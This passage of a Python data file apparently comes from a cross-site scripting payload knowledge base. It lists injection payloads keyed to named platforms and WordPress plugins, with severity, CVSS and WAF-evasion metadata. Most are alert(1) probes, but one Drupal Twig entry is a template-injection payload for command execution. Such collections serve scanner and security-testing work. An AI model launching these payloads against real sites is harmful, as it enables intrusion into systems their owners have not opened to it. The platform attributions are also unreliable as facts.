        cvss_score=8.0,
        description="Shopify Liquid template injection",
        tags=["shopify", "liquid"],
        bypasses=["template_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    # ============================================================
    # UBER BUG BOUNTY STYLE
    # ============================================================
    "uber-deeplink-xss": PayloadEntry(
        payload='uber://?action=setPickup&pickup[nickname]="><script>alert(1)</script>',
        contexts=["url"],
        severity="high",
        cvss_score=8.0,
        description="Uber deeplink parameter injection",
        tags=["uber", "deeplink"],
        bypasses=["deeplink_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # GITHUB BUG BOUNTY STYLE
    # ============================================================
    "github-markdown-xss-1": PayloadEntry(
        payload="[clickme](javascript:alert(1))",
        contexts=["markdown"],
        severity="high",
        cvss_score=7.5,
        description="GitHub Markdown link injection",
        tags=["github", "markdown"],
        bypasses=["markdown_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    "github-markdown-xss-2": PayloadEntry(
        payload="![alt](javascript:alert(1))",
        contexts=["markdown"],
        severity="high",
        cvss_score=7.5,
        description="GitHub Markdown image injection",
        tags=["github", "markdown"],
        bypasses=["markdown_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    "github-wiki-xss": PayloadEntry(
        payload="[[page|javascript:alert(1)]]",
        contexts=["markdown"],
        severity="high",
        cvss_score=7.5,
        description="GitHub Wiki link injection",
        tags=["github", "wiki"],
        bypasses=["wiki_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    "github-actions-xss": PayloadEntry(
        payload="${{ github.event.issue.title }}",
        contexts=["json"],
        severity="critical",
        cvss_score=9.0,
        description="GitHub Actions expression injection",
        tags=["github", "actions", "expression"],
        bypasses=["expression_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    # ============================================================
    # SLACK BUG BOUNTY STYLE
    # ============================================================
    "slack-mrkdwn-xss": PayloadEntry(
        payload="<javascript:alert(1)|Click here>",
        contexts=["postmessage"],
        severity="high",
        cvss_score=7.5,
        description="Slack mrkdwn link injection",
        tags=["slack", "mrkdwn"],
        bypasses=["slack_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    "slack-unfurl-xss": PayloadEntry(
        payload='<a href="javascript:alert(1)" title="click">link</a>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Slack unfurl preview injection",
        tags=["slack", "unfurl"],
        bypasses=["unfurl_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # JIRA/ATLASSIAN BUG BOUNTY STYLE
    # ============================================================
    "jira-wiki-xss": PayloadEntry(
        payload="{html}<script>alert(1)</script>{html}",
        contexts=["markdown"],
        severity="high",
        cvss_score=8.0,
        description="Jira wiki markup HTML injection",
        tags=["jira", "wiki"],
        bypasses=["wiki_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "confluence-macro-xss": PayloadEntry(
        payload="{code:javascript}alert(1){code}",
        contexts=["markdown"],
        severity="high",
        cvss_score=7.5,
        description="Confluence macro injection",
        tags=["confluence", "macro"],
        bypasses=["macro_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # SALESFORCE BUG BOUNTY STYLE
    # ============================================================
    "salesforce-visualforce-xss": PayloadEntry(
        payload='<apex:outputText value="{!$CurrentPage.parameters.xss}" escape="false"/>',
        contexts=["template"],
        severity="critical",
        cvss_score=9.0,
        description="Salesforce Visualforce parameter injection",
        tags=["salesforce", "visualforce"],
        bypasses=["apex_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    # ============================================================
    # YAHOO BUG BOUNTY STYLE
    # ============================================================
    "yahoo-mail-xss": PayloadEntry(
        payload='<div style="background:url(javascript:alert(1))">',
        contexts=["html_content", "email"],
        severity="high",
        cvss_score=8.0,
        description="Yahoo Mail CSS background injection",
        tags=["yahoo", "mail", "css"],
        bypasses=["css_filters"],
        waf_evasion=True,
        browser_support=["ie"],
        reliability="low",
    ),
    # ============================================================
    # ADOBE BUG BOUNTY STYLE
    # ============================================================
    "adobe-flash-xss": PayloadEntry(
        payload='getURL("javascript:alert(1)")',
        contexts=["flash"],
        severity="high",
        cvss_score=7.5,
        description="Adobe Flash getURL injection",
        tags=["adobe", "flash"],
        bypasses=["flash_filters"],
        waf_evasion=True,
        browser_support=[],
        reliability="low",
    ),
    "adobe-pdf-js-xss": PayloadEntry(
        payload="app.alert(1)",
        contexts=["pdf"],
        severity="high",
        cvss_score=7.5,
        description="Adobe PDF JavaScript execution",
        tags=["adobe", "pdf"],
        bypasses=["pdf_filters"],
        waf_evasion=True,
        browser_support=["chrome", "edge"],
        reliability="medium",
    ),
    # ============================================================
    # DROPBOX BUG BOUNTY STYLE
    # ============================================================
    "dropbox-preview-xss": PayloadEntry(
        payload='<svg onload="alert(1)">',
        contexts=["svg"],
        severity="high",
        cvss_score=8.0,
        description="Dropbox file preview SVG injection",
        tags=["dropbox", "preview", "svg"],
        bypasses=["preview_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    # ============================================================
    # LINKEDIN BUG BOUNTY STYLE
    # ============================================================
    "linkedin-profile-xss": PayloadEntry(
        payload='"><script>alert(1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=8.0,
        description="LinkedIn profile field injection",
        tags=["linkedin", "profile"],
        bypasses=["profile_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # AIRBNB BUG BOUNTY STYLE
    # ============================================================
    "airbnb-listing-xss": PayloadEntry(
        payload="<img src=x onerror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=8.0,
        description="Airbnb listing description injection",
        tags=["airbnb", "listing"],
        bypasses=["listing_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # STRIPE BUG BOUNTY STYLE
    # ============================================================
    "stripe-checkout-xss": PayloadEntry(
        payload="success_url=javascript:alert(document.domain)",
        contexts=["url"],
        severity="critical",
        cvss_score=9.0,
        description="Stripe checkout redirect injection",
        tags=["stripe", "checkout"],
        bypasses=["url_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # ZENDESK BUG BOUNTY STYLE
    # ============================================================
    "zendesk-ticket-xss": PayloadEntry(
        payload="{{#each articles}}<script>alert(1)</script>{{/each}}",
        contexts=["template"],
        severity="high",
        cvss_score=8.0,
        description="Zendesk Handlebars template injection",
        tags=["zendesk", "handlebars"],
        bypasses=["template_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    # ============================================================
    # MAILCHIMP BUG BOUNTY STYLE
    # ============================================================
    "mailchimp-merge-xss": PayloadEntry(
        payload='*|UNSUB|*"><script>alert(1)</script>',
        contexts=["email"],
        severity="high",
        cvss_score=7.5,
        description="Mailchimp merge tag injection",
        tags=["mailchimp", "merge"],
        bypasses=["merge_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # TWILIO BUG BOUNTY STYLE
    # ============================================================
    "twilio-twiml-xss": PayloadEntry(
        payload="<Say><![CDATA[<script>alert(1)</script>]]></Say>",
        contexts=["xml"],
        severity="high",
        cvss_score=7.5,
        description="Twilio TwiML CDATA injection",
        tags=["twilio", "twiml", "xml"],
        bypasses=["xml_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # NOTION BUG BOUNTY STYLE
    # ============================================================
    "notion-embed-xss": PayloadEntry(
        payload="/embed?url=javascript:alert(1)",
        contexts=["url"],
        severity="high",
        cvss_score=8.0,
        description="Notion embed URL injection",
        tags=["notion", "embed"],
        bypasses=["embed_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # FIGMA BUG BOUNTY STYLE
    # ============================================================
    "figma-plugin-xss": PayloadEntry(
        payload='figma.showUI("<script>alert(1)</script>")',
        contexts=["javascript"],
        severity="high",
        cvss_score=8.0,
        description="Figma plugin UI injection",
        tags=["figma", "plugin"],
        bypasses=["plugin_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # DISCORD BUG BOUNTY STYLE
    # ============================================================
    "discord-embed-xss": PayloadEntry(
        payload='{"embeds":[{"url":"javascript:alert(1)"}]}',
        contexts=["json"],
        severity="high",
        cvss_score=7.5,
        description="Discord webhook embed injection",
        tags=["discord", "embed"],
        bypasses=["embed_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # TRELLO BUG BOUNTY STYLE
    # ============================================================
    "trello-card-xss": PayloadEntry(
        payload="[link](javascript:alert(1))",
        contexts=["markdown"],
        severity="high",
        cvss_score=7.5,
        description="Trello card description injection",
        tags=["trello", "markdown"],
        bypasses=["markdown_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # ASANA BUG BOUNTY STYLE
    # ============================================================
    "asana-task-xss": PayloadEntry(
        payload='<a href="javascript:alert(1)">click</a>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Asana task description injection",
        tags=["asana", "task"],
        bypasses=["task_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # WORDPRESS PLUGIN VULNERABILITIES
    # ============================================================
    "wp-contact-form-7": PayloadEntry(
        payload='[contact-form-7 id="1" html_id="<script>alert(1)</script>"]',
        contexts=["template"],
        severity="high",
        cvss_score=8.0,
        description="Contact Form 7 shortcode injection",
        tags=["wordpress", "plugin", "cf7"],
        bypasses=["shortcode_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "wp-yoast-seo": PayloadEntry(
        payload="<script>alert(1)</script><!--googleoff: index-->",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Yoast SEO meta injection pattern",
        tags=["wordpress", "plugin", "yoast"],
        bypasses=["seo_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    "wp-elementor": PayloadEntry(
        payload='{"id":"x","settings":{"custom_css":"</style><script>alert(1)</script><style>"}}',
        contexts=["json"],
        severity="high",
        cvss_score=8.0,
        description="Elementor custom CSS injection",
        tags=["wordpress", "plugin", "elementor"],
        bypasses=["css_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    # ============================================================
    # CMS SPECIFIC
    # ============================================================
    "drupal-twig-xss": PayloadEntry(
        payload='{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}',
        contexts=["template"],
        severity="critical",
        cvss_score=9.5,
        description="Drupal Twig SSTI to RCE",
        tags=["drupal", "twig", "ssti"],
        bypasses=["template_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "magento-widget-xss": PayloadEntry(
        payload='{{widget type="Magento\\Cms\\Block\\Widget\\Block" template="<script>alert(1)</script>"}}',
        contexts=["template"],
        severity="high",
        cvss_score=8.0,
        description="Magento widget directive injection",
        tags=["magento", "widget"],
        bypasses=["widget_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "prestashop-smarty-xss": PayloadEntry(
        payload="{$smarty.version}{literal}<script>alert(1)</script>{/literal}",
        contexts=["template"],
        severity="high",
        cvss_score=8.0,
        description="PrestaShop Smarty template injection",
        tags=["prestashop", "smarty"],
        bypasses=["template_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
}

BRS_KB_BUGBOUNTY_REAL_TOTAL_PAYLOADS = len(BRS_KB_BUGBOUNTY_REAL_PAYLOADS)
